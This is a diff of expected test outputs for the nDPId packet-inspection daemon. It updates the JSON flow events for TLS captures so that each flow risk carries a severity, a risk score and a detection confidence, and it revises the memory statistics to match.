 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1595697597760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1595697597760,"pkt":"LLBdqyO5+P\/CRWqLCABFAAAoAABAAEAGYazAqAEVaBGvVdjaAbvycO9kZJomslAQEAB++AAA"}
-00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697597731,"flow_last_seen":1595697597760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":639,"flow_avg_l4_payload_len":159,"midstream":0,"ts_msec":1595697597760,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","21":"TLS Suspicious ESNI Usage"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}}
-01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697597731,"flow_last_seen":1595697597802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2099,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":1595697597802,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","21":"TLS Suspicious ESNI Usage"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}}
-00754{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1595697574192,"flow_last_seen":1595697574326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7615,"flow_avg_l4_payload_len":380,"midstream":0,"ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","21":"TLS Suspicious ESNI Usage"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}}
-00754{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1595697597731,"flow_last_seen":1595697597855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6160,"flow_avg_l4_payload_len":342,"midstream":0,"ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","21":"TLS Suspicious ESNI Usage"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}}
+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1595697597731,"flow_last_seen":1595697597760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":639,"flow_avg_l4_payload_len":159,"midstream":0,"ts_msec":1595697597760,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3"}}
+01203{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1595697597731,"flow_last_seen":1595697597802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2099,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":1595697597802,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"you-think-thats-normal-tls-traffic-youre-seeing.com","ja3":"077d20c3f8c5a1f091dc937c515b69c1","ja3s":"d75f9129bb5d05492a65ff78e081bcb2","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","tls_supported_versions":"TLSv1.3"}}
+00944{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1595697574192,"flow_last_seen":1595697574326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7615,"flow_avg_l4_payload_len":380,"midstream":0,"ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55500,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}}
+00944{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1595697597731,"flow_last_seen":1595697597855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6160,"flow_avg_l4_payload_len":342,"midstream":0,"ts_msec":1595697597855,"l3_proto":"ip4","src_ip":"192.168.1.21","dst_ip":"104.17.175.85","src_port":55514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"21": {"risk":"TLS Suspicious ESNI Usage","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}}
 00166{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"tls_esni_sni_both.pcap","alias":"nDPId-test","total-events-serialized":16}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 38/38
@@ -22,10 +22,10 @@
 ~~ total active/idle flows...: 2/2
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4602413 bytes
-~~ total memory freed........: 4602413 bytes
-~~ total allocations/frees...: 99600/99600
+~~ total memory allocated....: 4687038 bytes
+~~ total memory freed........: 4687038 bytes
+~~ total allocations/frees...: 101190/101190
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 171 chars
-~~ json string max len.......: 1018 chars
-~~ json string avg len.......: 664 chars
+~~ json string max len.......: 1208 chars
+~~ json string avg len.......: 759 chars
diff --git a/test/results/tls_invalid_reads.pcap.out b/test/results/tls_invalid_reads.pcap.out
index b9b8b30c3..1bca1474a 100644
--- a/test/results/tls_invalid_reads.pcap.out
+++ b/test/results/tls_invalid_reads.pcap.out
@@ -5,12 +5,12 @@
 00194{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":2,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","l4_data_len":32}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1252380859884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1252380859884,"pkt":"ABTRQblQABy\/PaVxCABFAAAoMP9AAIAG8zDAqAplziE9cQ9\/AbtzVLVyvsgCMFAQ+vDjSQAA"}
 00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1252380859885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"ts_msec":1252380859885,"pkt":"ABTRQblQABy\/OaVxCABFAACOMQBAAIAG8snAqAplziE9cQ9\/AbtzVLVyvsgCMFAY+vBuTgAAFgMBAGEBAABdAwFKpdC7WffXCrqul0rRyqlV7PYgfbDHC7SZ1YAJU4BSeiCCetHfydzbddwggCw2Ef4Y\/Wcmum3i+DV+RW7iw5bCGwAWAAQABQAKAAkAZABiAAMABgATABIAJQAA"}
-00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1252380859868,"flow_last_seen":1252380859885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1252380859885,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00840{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1252380859868,"flow_last_seen":1252380859904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":190,"midstream":0,"ts_msec":1252380859904,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"53611273a714cb4789c8222932efd5a7","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
+00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1252380859868,"flow_last_seen":1252380859885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1252380859885,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1252380859868,"flow_last_seen":1252380859904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":190,"midstream":0,"ts_msec":1252380859904,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"53611273a714cb4789c8222932efd5a7","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1252380859868,"flow_last_seen":1252380859943,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":204,"midstream":0,"ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7440000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1421985541772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1421985541772,"pkt":"AAOf2SAhEFbKCIWJCABFAAAyM2VAAH8GFrhKUKBjQ9lNHAy6AbvQcb+g7Sa+J1AY\/QKZOwAlAAMBAAUBAAABAQ=="}
-00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7440000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7440000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7440000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"ts_msec":1544035479538,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00456{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":118,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":118,"pkt_l4_len":0,"ts_msec":1544035479538,"pkt":"AAAAAAAFYAgQGhx\/gQBsn4EAYAIIAEVoAGDVegAA\/xG3XAruJEAK7vQxCGgIaABMAAAw\/wA8B+zklkUAADyx3UAAQAbcAwq\/ixE23eAt5LgBu\/kVfJ4AAAAAoAL\/\/3GmAAACBAW0BAIICgAUzUMAAAAAAQMDBg=="}
 00178{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","layer_type":33024}
@@ -27,10 +27,10 @@
 ~~ total active/idle flows...: 2/2
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4600357 bytes
-~~ total memory freed........: 4600357 bytes
-~~ total allocations/frees...: 99566/99566
+~~ total memory allocated....: 4684982 bytes
+~~ total memory freed........: 4684982 bytes
+~~ total allocations/frees...: 101156/101156
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 171 chars
-~~ json string max len.......: 845 chars
-~~ json string avg len.......: 511 chars
+~~ json string max len.......: 950 chars
+~~ json string avg len.......: 563 chars
diff --git a/test/results/tls_long_cert.pcap.out b/test/results/tls_long_cert.pcap.out
index 0498e38a4..fc5fa93a0 100644
--- a/test/results/tls_long_cert.pcap.out
+++ b/test/results/tls_long_cert.pcap.out
@@ -3,10 +3,10 @@
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1553619078033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1553619078033,"pkt":"BBjWMe9aeDHBvV4kCABFAABAAABAAEAGN8XAqAJ+aG\/XXesOAbssL+yBAAAAALAC\/\/8wZwAAAgQFtAEDAwYBAQgKJK\/ZdwAAAAAEAgAA"}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1553619078058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1553619078058,"pkt":"eDHBvV4kBBjWMe9aCABFAAA8AABAADYGQclob9ddwKgCfgG76w4xmkZeLC\/sgqAScSAcqQAAAgQFtAQCCArQt2rgJK\/ZdwEDAwc="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1553619078058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1553619078058,"pkt":"BBjWMe9aeDHBvV4kCABFAAA0AABAAEAGN9HAqAJ+aG\/XXesOAbssL+yCMZpGX4AQCAq0dAAAAQEICiSv2Y7Qt2rg"}
-00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1553619078033,"flow_last_seen":1553619078058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1553619078058,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1553619078033,"flow_last_seen":1553619078091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"ts_msec":1553619078091,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-02396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1553619078033,"flow_last_seen":1553619078093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":1553619078093,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","server_names":"www.repstatic.it,repstatic.it,amp-video.lastampa.it,www.repubblica.it,amp-video.deejay.it,amp-video.d.repubblica.it,www.gelestatic.it,oasjs.kataweb.it,video.d.repubblica.it,www.test.capital.it,napoli.repubblica.it,video.ilsecoloxix.it,genova.repubblica.it,cdn.gelestatic.it,video.gelocal.it,media.deejay.it,media.m2o.it,amp-video.espresso.repubblica.it,download.gelocal.it,amp-video.m2o.it,bologna.repubblica.it,torino.repubblica.it,scripts.kataweb.it,palermo.repubblica.it,roma.repubblica.it,video.xl.repubblica.it,amp-video.gelocal.it,video.espresso.repubblica.it,www.capital.it,video.limesonline.com,media.capital.it,syndication-vod-pro.akamai.media.kataweb.it,test.capital.it,video.deejay.it,video.repubblica.it,milano.repubblica.it,video.lanuovasardegna.it,video.m2o.it,parma.repubblica.it,video.3nz.it,syndication-vod-hds.akamai.media.kataweb.it,amp-video.repubblica.it,video.lastampa.it,webfragments.repubblica.it,amp-video.xl.repubblica.it,amp-video.limesonline.com,media.kataweb.it,bari.repubblica.it,syndication-vod-hls.akamai.media.kataweb.it,amp-video.3nz.it,syndication3rd-vod-pro.akamai.media.kataweb.it,firenze.repubblica.it,amp-video.ilsecoloxix.it,amp-video.lanuovasardegna.it,cdn.flv.kataweb.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust RSA CA 2018","subjectDN":"C=IT, ST=Roma, L=Roma, O=GEDI Digital S.r.l., CN=www.repstatic.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"0C:9F:21:DB:65:A1:BE:EB:D8:89:38:D3:FF:7A:D9:02:8B:F1:60:A1"}}
-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":182,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":182,"flow_first_seen":1553619078033,"flow_last_seen":1553619149372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":105569,"flow_avg_l4_payload_len":580,"midstream":0,"ts_msec":1553619149372,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1553619078033,"flow_last_seen":1553619078058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1553619078058,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
